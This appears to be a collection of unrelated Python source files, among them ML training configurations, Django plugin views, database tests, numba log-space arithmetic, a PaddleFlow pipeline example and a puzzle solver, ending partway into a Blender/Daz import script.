argp.add_argument("--docker", required=True)
args = argp.parse_args()
main(args)
|
456216
|
import argparse
import torch
from utils.cli import boolean_argument
def get_args(rest_args):
parser = argparse.ArgumentParser()
parser.add_argument("--env-name", default="PointRobotSparse-v0")
parser.add_argument("--seed", type=int, default=73)
parser.add_argument("--max-rollouts-per-task", default=2)
parser.add_argument("--num-trajs-per-task", type=int, default=None)
parser.add_argument("--hindsight-relabelling", type=int, default=True)
# parser.add_argument('--hindsight-relabelling', type=int, default=False)
parser.add_argument("--num-iters", default=100)
parser.add_argument("--tasks-batch-size", default=8)
parser.add_argument("--vae-batch-num-rollouts-per-task", default=8)
parser.add_argument(
"--vae-lr",
type=float,
default=0.0003,
help="learning rate for VAE (default: 3e-4)",
)
parser.add_argument(
"--kl-weight", type=float, default=0.05, help="weight for the KL term"
)
parser.add_argument(
"--vae-batch-num-elbo-terms",
default=None,
help="for how many timesteps to compute the ELBO; None uses all",
)
# - encoder
parser.add_argument(
"--encoder_type", type=str, default="rnn", help="choose: rnn, tcn, deepset"
)
parser.add_argument(
"--task-embedding-size",
type=int,
default=5,
help="dimensionality of latent space",
)
parser.add_argument("--aggregator-hidden-size", type=int, default=128)
parser.add_argument("--layers-before-aggregator", nargs="+", type=int, default=[])
parser.add_argument("--layers-after-aggregator", nargs="+", type=int, default=[])
# parser.add_argument('--action-embedding-size', type=int, default=0)
parser.add_argument("--action-embedding-size", type=int, default=16)
parser.add_argument("--state-embedding-size", type=int, default=32)
parser.add_argument("--reward-embedding-size", type=int, default=16)
# - decoder: rewards
parser.add_argument("--decode-reward", default=True, help="use reward decoder")
parser.add_argument(
"--input-prev-state", default=False, help="use prev state for rew pred"
)
parser.add_argument(
"--input-action", default=False, help="use prev action for rew pred"
)
parser.add_argument(
"--reward-decoder-layers", nargs="+", type=int, default=[32, 32]
)
parser.add_argument(
"--rew-pred-type",
type=str,
default="deterministic",
help="choose from: bernoulli, deterministic",
)
parser.add_argument(
"--multihead-for-reward",
default=False,
help="one head per reward pred (i.e. per state)",
)
parser.add_argument("--rew-loss-coeff", type=float, default=1.0)
# - decoder: state transitions
parser.add_argument("--decode-state", default=False)
parser.add_argument("--state-loss-coeff", type=float, default=1.0)
# - decoder: ground-truth task (after Humplik et al. 2019)
parser.add_argument("--decode-task", default=False)
parser.add_argument("--task-loss-coeff", default=1.0)
# --- ABLATIONS ---
parser.add_argument("--disable-decoder", default=False)
parser.add_argument("--disable-stochasticity-in-latent", default=False)
parser.add_argument("--kl-to-gauss-prior", default=False)
parser.add_argument("--learn-prior", default=False)
parser.add_argument(
"--decode-only-past",
default=False,
help="whether to decode future observations",
)
parser.add_argument("--log-interval", default=1)
parser.add_argument("--save-interval", default=5)
parser.add_argument("--eval-interval", default=20)
parser.add_argument("--main-data-dir", default="./batch_data")
parser.add_argument("--data-dir", default="data_rand_init")
parser.add_argument("--save-dir-prefix", default="relabel_rand_init")
# parser.add_argument('--save-dir-prefix', default='no_relabel_rand_init')
parser.add_argument("--log-tensorboard", default=True)
parser.add_argument("--save-model", default=True)
parser.add_argument("--save-dir", default="./trained_vae")
parser.add_argument("--use-gpu", default=True)
args = parser.parse_args(rest_args)
return args
|
456218
|
from builtins import str
from django.contrib import messages
from django.urls import reverse
from django.shortcuts import redirect
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from pykeg.web.decorators import staff_member_required
from pykeg.util import kbjson
from . import forms
from . import client
@staff_member_required
def admin_settings(request, plugin):
context = {}
settings_form = plugin.get_site_settings_form()
if request.method == "POST":
if "submit-settings" in request.POST:
settings_form = forms.SiteSettingsForm(request.POST)
if settings_form.is_valid():
plugin.save_site_settings_form(settings_form)
venue_id = settings_form.cleaned_data.get("venue_id")
venue = None
if venue_id:
c = plugin.get_client()
try:
venue = c.venues(venue_id)
except client.FoursquareClientError as e:
messages.error(request, "Error fetching venue information: %s" % str(e))
plugin.save_venue_detail(venue)
messages.success(request, "Settings updated.")
if "test-api" in request.POST:
plugin = request.plugins["foursquare"]
c = plugin.get_client()
venue_id = plugin.get_venue_id() or "49d01698f964a520fd5a1fe3" # Golden Gate Bridge
try:
venue_info = c.venues(venue_id)
context["test_response"] = kbjson.dumps(venue_info, indent=2)
messages.success(request, "API test successful.")
except client.FoursquareClientError as e:
messages.success(request, "API test failed: {}".format(e))
context["plugin"] = plugin
context["settings_form"] = settings_form
context["venue_detail"] = plugin.get_venue_detail()
return render(request, "contrib/foursquare/foursquare_admin_settings.html", context=context)
@login_required
def user_settings(request, plugin):
context = {}
user = request.user
settings_form = plugin.get_user_settings_form(user)
if request.method == "POST":
if "submit-settings" in request.POST:
settings_form = forms.UserSettingsForm(request.POST)
if settings_form.is_valid():
plugin.save_user_settings_form(user, settings_form)
messages.success(request, "Settings updated")
context["plugin"] = plugin
context["venue"] = plugin.get_venue_detail()
context["profile"] = plugin.get_user_profile(user)
context["settings_form"] = settings_form
return render(request, "contrib/foursquare/foursquare_user_settings.html", context=context)
@login_required
def auth_redirect(request):
if "submit-remove" in request.POST:
plugin = request.plugins.get("foursquare")
plugin.save_user_profile(request.user, None)
plugin.save_user_token(request.user, "")
messages.success(request, "Removed Foursquare account.")
return redirect("account-plugin-settings", plugin_name="foursquare")
plugin = request.plugins["foursquare"]
client = plugin.get_client()
redirect_url = request.build_absolute_uri(reverse("plugin-foursquare-callback"))
url = client.get_authorization_url(redirect_url)
return redirect(url)
@login_required
def auth_callback(request):
plugin = request.plugins["foursquare"]
client = plugin.get_client()
code = request.GET.get("code")
redirect_url = request.build_absolute_uri(reverse("plugin-foursquare-callback"))
token = client.handle_authorization_callback(code, redirect_url)
profile = client.users(token)
if not profile or not profile.get("user"):
messages.error(request, "Unexpected profile response.")
else:
profile = profile["user"]
plugin.save_user_profile(request.user, profile)
plugin.save_user_token(request.user, token)
username = "%s %s" % (profile.get("firstName"), profile.get("lastName"))
messages.success(request, "Successfully linked to foursquare user %s" % username)
return redirect("account-plugin-settings", plugin_name="foursquare")
|
456243
|
import sys
from ._C import mecab_cost_train, mecab_dict_gen, mecab_dict_index, mecab_main, mecab_system_eval, mecab_test_gen
def run_mecab_main(argv=sys.argv):
mecab_main(argv)
def run_mecab_dict_index(argv=sys.argv):
mecab_dict_index(argv)
def run_mecab_dict_gen(argv=sys.argv):
mecab_dict_gen(argv)
def run_mecab_cost_train(argv=sys.argv):
mecab_cost_train(argv)
def run_mecab_system_eval(argv=sys.argv):
mecab_system_eval(argv)
def run_mecab_test_gen(argv=sys.argv):
mecab_test_gen(argv)
|
456351
|
from PyFlow.UI.Canvas.UINodeBase import UINodeBase
from PyFlow.Packages.PyFlowOpenCv.UI.UIOpenCvBaseNode import UIOpenCvBaseNode
from PyFlow.Packages.PyFlowOpenCv.UI.UICv_TransformNode import UICv_TransformNode
def createUINode(raw_instance):
if raw_instance.__class__.__name__ == "cv_Transform":
return UICv_TransformNode(raw_instance)
return UIOpenCvBaseNode(raw_instance)
|
456357
|
from datetime import date
from decimal import Decimal
from django.db.models.fields.files import ImageFieldFile, FieldFile
class BaseSerializer(object):
def serialize(self, value):
return value
class DateSerializer(BaseSerializer):
def serialize(self, value):
return str(value)
class DecimalSerializer(BaseSerializer):
def serialize(self, value):
return str(value)
class FileSerializer(BaseSerializer):
def serialize(self, value):
try:
return value.url
except:
return None
def serialize_field(value):
if isinstance(value, date):
return DateSerializer().serialize(value)
if isinstance(value, Decimal):
        return DecimalSerializer().serialize(value)
    if isinstance(value, ImageFieldFile) or isinstance(value, FieldFile):
return FileSerializer().serialize(value)
return value
|
456370
|
import multiprocessing
import os
import pickle
import tempfile
import time
import unittest
import uuid
from hypothesis import given
from hypothesis.strategies import text
try:
import pymongo
except ImportError:
pymongo = None
from chocolate import SQLiteConnection, MongoDBConnection, DataFrameConnection, Space, uniform, QuasiRandom
mongodb = False  # default so the skipIf decorator below can be evaluated even when pymongo is missing
if pymongo is not None:
client = pymongo.MongoClient("mongodb://localhost:27017/", serverSelectionTimeoutMS=5)
try:
client.server_info()
except pymongo.errors.ServerSelectionTimeoutError:
mongodb = False
else:
mongodb = True
def lock_db(conn_class, *args):
conn = conn_class(*args)
with conn.lock():
time.sleep(1)
class Base(object):
def test_lock(self):
p = multiprocessing.Process(target=lock_db, args=(self.conn_func,) + self.conn_args)
p.start()
timeout = False
start_time = time.time()
while time.time() - start_time < 10:
try:
with self.conn.lock(timeout=0.1):
pass
except TimeoutError:
timeout = True
break
time.sleep(0.1)
p.join()
self.assertEqual(timeout, True)
def test_reentrant_lock(self):
with self.conn.lock(timeout=1):
with self.conn.lock(timeout=1):
pass
def test_results(self):
data = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67, "hij": 23}]
for d in data:
self.conn.insert_result(d)
res = self.conn.all_results()
self.assertEqual(len(data), len(res))
self.assertEqual(len(data), self.conn.count_results())
res = sorted(res, key=lambda d: d["abc"])
data = sorted(data, key=lambda d: d["abc"])
for r, d in zip(res, data):
for k, v in d.items():
self.assertIn(k, r)
self.assertEqual(v, r[k])
res = self.conn.find_results({"abc": 67})
self.assertEqual(1, len(res))
self.assertIn("hij", res[0])
self.assertIn("def", res[0])
self.assertIn("abc", res[0])
def test_update_result(self):
data = {"abc": 0, "def": 2}
token = {"_chocolate_id": 0}
entry = data.copy()
entry["loss"] = None
entry.update(token)
self.conn.insert_result(entry)
values = {"_loss": 0.98}
self.conn.update_result(token, values)
res = self.conn.all_results()[0]
self.assertEqual(values["_loss"], res["_loss"])
def test_complementaries(self):
data = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67}]
for d in data:
self.conn.insert_complementary(d)
res = self.conn.all_complementary()
self.assertEqual(len(data), len(res))
res = sorted(res, key=lambda d: d["abc"])
data = sorted(data, key=lambda d: d["abc"])
for r, d in zip(res, data):
for k, v in d.items():
self.assertIn(k, r)
self.assertEqual(v, r[k])
res = self.conn.find_complementary(data[2])
self.assertEqual(res["abc"], data[2]["abc"])
def test_space(self):
s = {"a": uniform(1, 2),
"b": {"c": {"c1": uniform(0, 5)},
"d": {"d1": uniform(0, 6)}}}
space = Space(s)
space_read = self.conn.get_space()
self.assertEqual(space_read, None)
self.conn.insert_space(space)
space_read = self.conn.get_space()
self.assertEqual(space, space_read)
self.assertRaises(AssertionError, self.conn.insert_space, space)
def test_conditional_space(self):
u = uniform(0.0, 2)
l = uniform(1, 4)
qu = uniform(0.01, 1)
ql = uniform(5, 10)
s = [{"k1" : "a", "k2" : "b",
"a" : u,
"b" : l},
{"k1" : "a", "k2" : "c",
"a" : qu,
"c" : ql}]
space = Space(s)
space_read = self.conn.get_space()
self.assertEqual(space_read, None)
self.conn.insert_space(space)
space_read = self.conn.get_space()
self.assertEqual(space, space_read)
self.assertRaises(AssertionError, self.conn.insert_space, space)
def test_clear(self):
self.conn.insert_result({"foo": "bar"})
self.conn.insert_complementary({"bar": "spam", "foo": 2})
self.conn.insert_space("some_data")
self.conn.clear()
self.assertEqual(self.conn.count_results(), 0)
self.assertEqual(self.conn.all_complementary(), [])
self.assertEqual(self.conn.get_space(), None)
def test_pop_id(self):
entry = {"foo": "bar", "bar": "spam", "_loss" : 0.1}
self.conn.insert_result(entry)
results = self.conn.find_results({})
for doc in results:
doc = self.conn.pop_id(doc)
self.assertEqual(doc, entry)
self.conn.insert_complementary(entry)
comp = self.conn.find_complementary({})
comp = self.conn.pop_id(comp)
self.assertEqual(comp, entry)
class TestSQLite(unittest.TestCase, Base):
def setUp(self):
self.tmp_dir = tempfile.TemporaryDirectory()
self.db_name = "tmp.db"
self.engine_str = "sqlite:///{}".format(os.path.join(self.tmp_dir.name, self.db_name))
self.conn = SQLiteConnection(self.engine_str)
self.conn_func = SQLiteConnection
self.conn_args = (self.engine_str,)
def tearDown(self):
self.tmp_dir.cleanup()
def test_empty_name_connect(self):
engine_str = "sqlite:///{}".format(os.path.join(self.tmp_dir.name, ""))
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
@given(text(alphabet="/ "))
def test_invalid_ending_name_connect(self, s):
engine_str = "sqlite:///{}".format(os.path.join(self.tmp_dir.name, s))
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
def test_no_uri_connect(self):
engine_str = os.path.join(self.tmp_dir.name, self.db_name)
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
def test_memory_raises(self):
engine_str = "sqlite:///:memory:"
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
@unittest.skipIf(pymongo is None, "Cannot find pymongo module")
@unittest.skipIf(mongodb == False, "Cannot cannot connect to mongodb://localhost:27017/")
class TestMongoDB(unittest.TestCase, Base):
def setUp(self):
self.db_name = str(uuid.uuid1())
self.engine_str = "mongodb://localhost:27017/"
self.conn = MongoDBConnection(self.engine_str, database=self.db_name)
self.conn_func = MongoDBConnection
self.conn_args = (self.engine_str, self.db_name)
def tearDown(self):
self.conn.client.drop_database(self.db_name)
class TestDataFrame(unittest.TestCase, Base):
def setUp(self):
self.conn = DataFrameConnection()
def test_lock(self):
pass
def test_pickle(self):
data = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67, "hij": 23}]
comp = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67, "hij": 23}]
space = {"a": uniform(1, 2),
"b": {"c": {"c1": uniform(0, 5)},
"d": {"d1": uniform(0, 6)}}}
for d in data:
self.conn.insert_result(d)
for c in comp:
self.conn.insert_complementary(c)
self.conn.insert_space(Space(space))
s = pickle.dumps(self.conn)
l = pickle.loads(s)
self.assertEqual(self.conn.results.equals(l.results), True)
self.assertEqual(self.conn.complementary.equals(l.complementary), True)
self.assertEqual(l.space, self.conn.space)
|
456373
|
class CandidateDescriptor(object):
"""
    Descriptor that defines a candidate the solver wants to be checked.
    It is used to label/identify the candidates and their results in the case of batch processing.
"""
def __init__(self, **definingValues):
"""
        @param definingValues The class assumes that all variables passed to the computer are parameters of
                              the candidate this instance should represent.
"""
import uuid
self._definingValues = definingValues
self._definingStr = str()
for item in sorted(definingValues.items()):
self._definingStr = self._definingStr + "'" + str(item[0]) + "':'" + str(item[1]) + "',"
self.ID = str(uuid.uuid4())
def __missing__(self, key):
return None
def __len__(self):
return len(self._definingValues)
def __contains__(self, key):
return key in self._definingValues
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._definingValues == other._definingValues
else:
return False
def __hash__(self):
return hash(self._definingStr)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
        return 'CandidateDescriptor(%s)' % (self._definingValues)
def __str__(self):
return '(%s)' % (self._definingValues)
def keys(self):
return self._definingValues.keys()
def __getitem__(self, key):
if key in self._definingValues:
return self._definingValues[key]
        raise KeyError('Unknown defining value key was requested. Key: {}; self: {}'.format(key, self))
def get_values(self):
return self._definingValues
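# Minimal usage sketch (illustrative only; parameter names are made up): two
# descriptors built from the same defining values compare equal and hash the same,
# so they can serve as dictionary keys when collecting batch results.
#   d1 = CandidateDescriptor(alpha=0.1, beta=2)
#   d2 = CandidateDescriptor(beta=2, alpha=0.1)
#   assert d1 == d2 and hash(d1) == hash(d2)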
class CandicateDescriptorWrapper:
class InternalCandidateValueWrapper:
def __init__(self, value_list):
self._value_list = value_list
def __gt__(self, other):
boundary_condition = True
for value in self._value_list:
if value > other:
continue
else:
boundary_condition = False
break
return boundary_condition
def __lt__(self, other):
boundary_condition = True
for value in self._value_list:
if value < other:
continue
else:
boundary_condition = False
break
return boundary_condition
def get(self):
return self._value_list
def __init__(self, keys):
self._cand = None
self._keys = keys
def __iter__(self):
return iter(self._cand)
def __getitem__(self, key):
return self.InternalCandidateValueWrapper([x[key] for x in self._cand])
def keys(self):
return self._keys
def set(self, obj):
self._cand = obj
def get(self):
return self._cand
|
456470
|
from asgiref.sync import async_to_sync
from channels.layers import get_channel_layer
def sysMsg(channel_name, msg_type, not_level, content={}):
"""
Notify system message to channel
"""
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
channel_name,
{
'type': 'notify.system_message',
'msg_type': msg_type,
'not_level': not_level,
**content
},
)
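# Minimal usage sketch (illustrative; the group name and payload are made up):
#   sysMsg("room_42", msg_type="task_done", not_level="info",
#          content={"detail": "export finished"})
# This dispatches a "notify.system_message" event to every consumer subscribed
# to the "room_42" channel group.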
|
456489
|
from numba import njit, boolean, int64, float64
from numba.experimental import jitclass
import numpy as np
from .utils import isin
@jitclass([
('value', float64[:]),
('sign', float64[:]),
('size', int64)
])
class signed:
def __init__(self, value, sign=None):
""" If sign is None, init from value in 'linear' space, possibly negative.
Else, init from value in log-space.
"""
if sign is None:
self.value = np.log(np.absolute(value))
self.sign = np.sign(value).astype(np.float64)
else:
self.value = value
self.sign = sign
self.size = len(value)
self.sign[self.value==-np.Inf] = 0.
def exp(self, exp):
""" Exponentiate signed value by exp.
Operates in log-space.
"""
value = self.value*exp
return signed(value, self.sign)
def nonpositive(self):
return self.sign <= 0
def nonnegative(self):
return self.sign >= 0
def nonzero(self):
return (self.value > -np.Inf) & (self.sign != 0)
def linear(self):
return self.sign * np.exp(self.value)
def argsort(self, increasing=True):
negatives = np.zeros(self.size, dtype=boolean)
order_positives = []
order_negatives = []
for i in range(self.size):
if self.sign[i] < 0:
negatives[i] = 1
order_negatives.append(i)
else:
order_positives.append(i)
if increasing:
delta = 1
else:
delta = -1
order_negatives = np.asarray([x for x, y in sorted(zip(order_negatives, -delta*self.value[negatives]), key = lambda x: x[1])])
order_positives = np.asarray([x for x, y in sorted(zip(order_positives, delta*self.value[~negatives]), key = lambda x: x[1])])
if increasing:
return np.concatenate((order_negatives, order_positives))
else:
return np.concatenate((order_positives, order_negatives))
def get(self, i):
assert i < self.size, "Index out of range."
return signed(self.value[i:i+1], self.sign[i:i+1])
def insert(self, sig, i):
assert i < self.size, "Index out of range."
assert sig.size == 1, "Can only insert signed with size 1."
self.value[i] = sig.value[0]
self.sign[i] = sig.sign[0]
def reduce(self):
if self.size == 1:
return self
max_i = np.argmax(self.value)
if np.isinf(self.value[max_i]):
return self.get(max_i)
indicators = np.ones(self.size, dtype=boolean)
indicators[max_i] = 0
r = np.sum(np.exp(self.value[indicators] - self.value[max_i])*(self.sign[indicators]*self.sign[max_i]))
if r < -1.:
return signed(np.asarray([self.value[max_i]]) + np.log(-1.-r), np.asarray([-self.sign[max_i]]))
res = signed(np.asarray([self.value[max_i]]) + np.log(r+1), np.asarray([self.sign[max_i]]))
return res
@njit
def signed_join(x, y):
if x is None:
return y
if y is None:
return x
return signed(np.concatenate((x.value, y.value)),
np.concatenate((x.sign, y.sign)))
@njit
def signed_prod(x, y):
res = signed(x.value + y.value, x.sign * y.sign)
if res.value[0] == -np.Inf: res.sign[0] = 0.
return res
@njit
def signed_sum_vec(x, y):
if x.size == y.size:
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
sum_ = signed_sum(x.get(i), y.get(i))
values[i], signs[i] = sum_.value[0], sum_.sign[0]
else:
        assert x.size == 1 or y.size == 1, 'If sizes do not match, one of the arrays must have size 1.'
if x.size == 1:
values = np.zeros(y.size)
signs = np.zeros(y.size)
for i in range(y.size):
sum_ = signed_sum(x.get(0), y.get(i))
values[i], signs[i] = sum_.value[0], sum_.sign[0]
else:
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
sum_ = signed_sum(x.get(i), y.get(0))
values[i], signs[i] = sum_.value[0], sum_.sign[0]
return signed(values, signs)
@njit
def signed_sum(x, y):
    assert (x.size == 1) & (y.size == 1), "Arrays must have size 1."
max_value = max(x.value[0], y.value[0])
if max_value == x.value[0]:
max_, min_ = x, y
else:
max_, min_ = y, x
if np.isinf(max_value):
return max_
r = np.sum(np.exp(min_.value - max_.value)*(min_.sign*max_.sign))
if r < -1.:
return signed(max_.value + np.log(-1.-r), -max_.sign)
res = signed(max_.value + np.log(r+1), max_.sign)
if res.value[0] == -np.Inf: res.sign[0] = 0.
return res
@njit
def signed_max_vec(x, y):
assert x.size == y.size, "Both arrays should have the same size."
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
max_ = signed_max(x.get(i), y.get(i))
values[i], signs[i] = max_.value[0], max_.sign[0]
return signed(values, signs)
@njit
def signed_min_vec(x, y):
assert x.size == y.size, "Both arrays should have the same size."
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
min_ = signed_min(x.get(i), y.get(i))
values[i], signs[i] = min_.value[0], min_.sign[0]
return signed(values, signs)
@njit
def signed_max(x, y):
xs = x.sign[0]
ys = y.sign[0]
if xs > ys: return x
if ys > xs: return y
if ys*y.value[0] > xs*x.value[0]: return y
return x
@njit
def signed_min(x, y):
xs = x.sign[0]
ys = y.sign[0]
if xs > ys: return y
if ys > xs: return x
if ys*y.value[0] > xs*x.value[0]: return x
return y
@njit
def signed_econtaminate(vec, signed_logprs, eps, ismax):
econt = np.asarray(vec) * (1-eps)
room = 1 - np.sum(econt)
if ismax:
order = signed_logprs.argsort(False)
else:
order = signed_logprs.argsort(True)
for i in order:
if room > eps:
econt[i] = econt[i] + eps
room -= eps
else:
econt[i] = econt[i] + room
break
return signed(econt, None)
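# Minimal usage sketch (illustrative; assumes numba can compile the jitclass):
#   s = signed(np.array([0.5, -2.0]))        # stores log|x| and sign(x)
#   s.linear()                               # -> approximately [0.5, -2.0]
#   signed_prod(s.get(0), s.get(1)).linear() # -> approximately [-1.0]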
|
456496
|
from creme import stream
from . import base
class ChickWeights(base.FileDataset):
"""Chick weights along time.
The stream contains 578 items and 3 features. The goal is to predict the weight of each chick
along time, according to the diet the chick is on. The data is ordered by time and then by
chick.
References:
1. [Chick weight dataset overview](http://rstudio-pubs-static.s3.amazonaws.com/107631_131ad1c022df4f90aa2d214a5c5609b2.html)
"""
def __init__(self):
super().__init__(filename='chick-weights.csv', n_samples=578, n_features=3, task=base.REG)
def __iter__(self):
return stream.iter_csv(
self.path,
target='weight',
converters={'time': int, 'weight': int, 'chick': int, 'diet': int}
)
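# Minimal usage sketch (illustrative; assumes creme's streaming dataset API):
#   for x, y in ChickWeights():
#       ...  # x is a dict with the time, chick and diet features, y is the weight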
|
456551
|
from zope.interface import implements
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
from twisted.application import internet
from oauth_proxy import oauth_proxy
class OAuthProxyServiceMaker(object):
implements(IServiceMaker, IPlugin)
tapname = "oauth_proxy"
description = "OAuth HTTP proxy"
options = oauth_proxy.Options
def makeService(self, options):
# TODO add error handling for missing params
useSSL = options["ssl"]
consumerKey = options["consumer-key"]
consumerSecret = options["consumer-secret"]
if options.has_key("token") and options.has_key("token-secret"):
token = options["token"]
tokenSecret = options["token-secret"]
else:
token = tokenSecret = None
port = int(options["port"])
credentials = oauth_proxy.OAuthCredentials(consumerKey, consumerSecret, token, tokenSecret)
credentialProvider = oauth_proxy.StaticOAuthCredentialProvider(credentials)
return internet.TCPServer(port, oauth_proxy.OAuthProxyFactory(credentialProvider, useSSL))
serviceMaker = OAuthProxyServiceMaker()
|
456617
|
import tensorflow as tf
import copy
from icecaps.estimators.estimator_chain import EstimatorChain
from icecaps.estimators.seq2seq_encoder_estimator import Seq2SeqEncoderEstimator
from icecaps.estimators.seq2seq_decoder_estimator import Seq2SeqDecoderEstimator
class Seq2SeqEstimator(EstimatorChain):
def __init__(self, model_dir="/tmp", params=dict(), config=None, scope="", is_mmi_model=False):
self.encoder = Seq2SeqEncoderEstimator(
model_dir, params, config=config, scope=scope+"/encoder")
self.decoder = Seq2SeqDecoderEstimator(
model_dir, params, config=config, scope=scope+"/decoder", is_mmi_model=is_mmi_model)
super().__init__([self.encoder, self.decoder],
model_dir, params, config, scope)
@classmethod
def list_params(cls, expected_params=None):
print("Seq2Seq Encoder:")
Seq2SeqEncoderEstimator.list_params(expected_params)
print()
print("Seq2Seq Decoder:")
Seq2SeqDecoderEstimator.list_params(expected_params)
print()
|
456661
|
import ConfigParser
import string
_ConfigDefault = {
"database.dbms": "mysql",
"database.name": "",
"database.user": "root",
"database.password": "",
"database.host": "127.0.0.1"
}
def LoadConfig(file, config={}):
"""
    returns a dictionary with keys of the form
    <section>.<option> and the values
"""
config = config.copy()
cp = ConfigParser.ConfigParser()
cp.read(file)
for sec in cp.sections():
name = string.lower(sec)
for opt in cp.options(sec):
config[name + "." + string.lower(opt)] = string.strip(cp.get(sec, opt))
return config
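# Illustrative example: an ini file containing
#   [Database]
#   user = admin
# yields {"database.user": "admin"} merged on top of the supplied defaults.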
if __name__=="__main__":
print LoadConfig("some.ini", _ConfigDefault)
|
456683
|
from paddleflow.pipeline import Pipeline
from paddleflow.pipeline import ContainerStep
from paddleflow.pipeline import Parameter
from paddleflow.pipeline import Artifact
from paddleflow.pipeline import CacheOptions
from paddleflow.pipeline import PF_USER_NAME
def job_info():
return {
"PF_JOB_TYPE": "vcjob",
"PF_JOB_MODE": "Pod",
"PF_JOB_QUEUE_NAME": "ppl-queue",
"PF_JOB_FLAVOUR": "flavour1",
}
def preprocess(data_path):
cache = CacheOptions(
enable=True,
max_expired_time=300,
fs_scope="cache_example/shells/data_artifact.sh"
)
return ContainerStep(
name="preprocess",
parameters={"data_path": data_path},
outputs={"train_data": Artifact(), "validate_data": Artifact()},
docker_env="centos:centos7",
cache_options=cache,
command="bash -x cache_example/shells/data_artifact.sh {{data_path}} {{train_data}} {{validate_data}}",
env={"USER_ABC": f"123_{PF_USER_NAME}"}
)
def train(epoch, train_data):
return ContainerStep(
name="train",
parameters={
"epoch": epoch,
},
inputs={"train_data": train_data},
outputs={"train_model": Artifact()},
command="bash -x cache_example/shells/train.sh {{epoch}} {{train_data}} {{train_model}}",
)
def validate(data, model):
cache = CacheOptions(
enable=False,
)
return ContainerStep(
name="validate",
inputs={"data":data, "model": model},
command="bash cache_example/shells/validate.sh {{model}}",
cache_options=cache,
)
cache = CacheOptions(
enable=True,
max_expired_time=600,
fs_scope="cache_example/shells/train.sh,cache_example/shells/validate.sh,cache_example/shells/data_artifact.sh"
)
@Pipeline(
name="cache_example",
docker_env="nginx:1.7.9",
cache_options=cache,
env=job_info(),
parallelism=1
)
def cache_example(data_path, epoch):
preprocess_step = preprocess(data_path)
train_step = train(epoch, preprocess_step.outputs["train_data"])
validate_step = validate(preprocess_step.outputs["validate_data"], train_step.outputs["train_model"])
if __name__ == "__main__":
ppl = cache_example(data_path="./cache_example/data/", epoch=15)
result = ppl.run(fsname="your_fs_name")
print(result)
|
456714
|
import configs_and_settings
import csv
import os
# C:\Users\Xavier\LSTMforSHM\data\time_series_datasets\csv_data_test_file.csv
# csv_file_path = r"C:\Users\Xavier\LSTMforSHM\data\time_series_datasets\csv_data_test_file.csv"
csv_file_path = r"C:\Users\Xavier\LSTMforSHM\data\csv_data\csv_data_test_file123.csv"
def read_csv_file(csv_file_path):
csv_data_row_elements = []
with open(csv_file_path, "r") as csv_file:
reader = csv.reader(csv_file, delimiter=';')
# len(reader)
for row in reader:
csv_data_row_elements.append(row)
print(', '.join(row))
return csv_data_row_elements
def read_csv_file_2_dict(csv_file_path):
csv_data_row_elements = []
with open(csv_file_path) as csv_file:
csv_dict_reader = csv.DictReader(csv_file, delimiter=';')
print(csv_dict_reader.fieldnames)
fieldnames_keys = csv_dict_reader.fieldnames
for row in csv_dict_reader:
csv_data_row_elements.append(row)
# print(row)
# print(row["Country"])
return csv_data_row_elements
# res1 = read_csv_file(csv_file_path)
res2 = read_csv_file_2_dict(csv_file_path)
# print(res1)
print(res2)
|
456738
|
import fileinput
from itertools import count
def slice_to_str(slice):
return ''.join(str(n) for n in slice)
INPUT = int(fileinput.input()[0])
input_str = str(INPUT)
input_len = len(input_str)
recipes = [3, 7]
recipes_len = 2
elf_1 = 0
elf_2 = 1
part_1 = None
part_2 = None
while part_1 is None or part_2 is None:
score = recipes[elf_1] + recipes[elf_2]
if score >= 10:
recipes.append(score // 10)
recipes.append(score % 10)
recipes_len += 2
else:
recipes.append(score)
recipes_len += 1
elf_1 = (elf_1 + recipes[elf_1] + 1) % recipes_len
elf_2 = (elf_2 + recipes[elf_2] + 1) % recipes_len
if part_1 is None and recipes_len > INPUT + 10:
part_1 = slice_to_str(recipes[INPUT:INPUT+10])
if part_2 is None:
if score >= 10 and slice_to_str(recipes[-1-input_len:-1]) == input_str:
part_2 = recipes_len - input_len - 1
if slice_to_str(recipes[-input_len:]) == input_str:
part_2 = recipes_len - input_len
print "Scores of recipes after puzzle input:", part_1
print "Number of recipes before puzzle input:", part_2
|
456770
|
import bpy
import os
import math
import json
from copy import deepcopy
from . import DataBase
from . import Versions
from . import Util
bUsePrincipledMat = True
isHighHeel = False
bRotationLimit = False
bLimitOnTwist = True
bUseCustomBone = False
bUseDrivers = False
#remove shape key from all wearable things, not just cloth
bRemoveShapeKeyFromWearable = True
# not used
bRemoveShapeKeyDrivers = False
bJoinEyelashToBody = True
bConvertBumpToNormal = False
bReuseNormal = True
# rate between Blender's Subsurface and iray's Translucency Weight
sss_rate = 0.1
isMan = False
root = ""
isGen = False
_AMTR = ""
_BODY = ""
_EYLS = ""
_HAIR = ""
_TEAR = ""
_RGFY = ""
keep_EYLS = ""
keep_TEAR = ""
db = DataBase.DB()
updated_bone_limits = []
dtu = None
Geo_Idx = 0
now_ary = []
pst_ary = []
_BVCount = 0
_SIZE = 0
root = ""
config = ""
_ISG3 = 0
_HOMETOWN = ""
_ASSETNAME = ""
already_use_newmtl = []
_ENVROOT = ""
shape_key_custom_props = []
G3_GEOIDX = 3
#####Female#######
# 0.G8
# 1.DazGenitalA (20200525-)
# 2.DazGenitalB
# 3.G3
######Male##########
# 0.G8
# 1.DazGenitalA(20200525-)
# 2.DazGenitalB
# 3.G3
max_vs = [
[
[16556, 65806, 262514],
[17192, 68350, 272690],
[17292, 68450, 272790],
[17418, 68744, 273396],
],
[
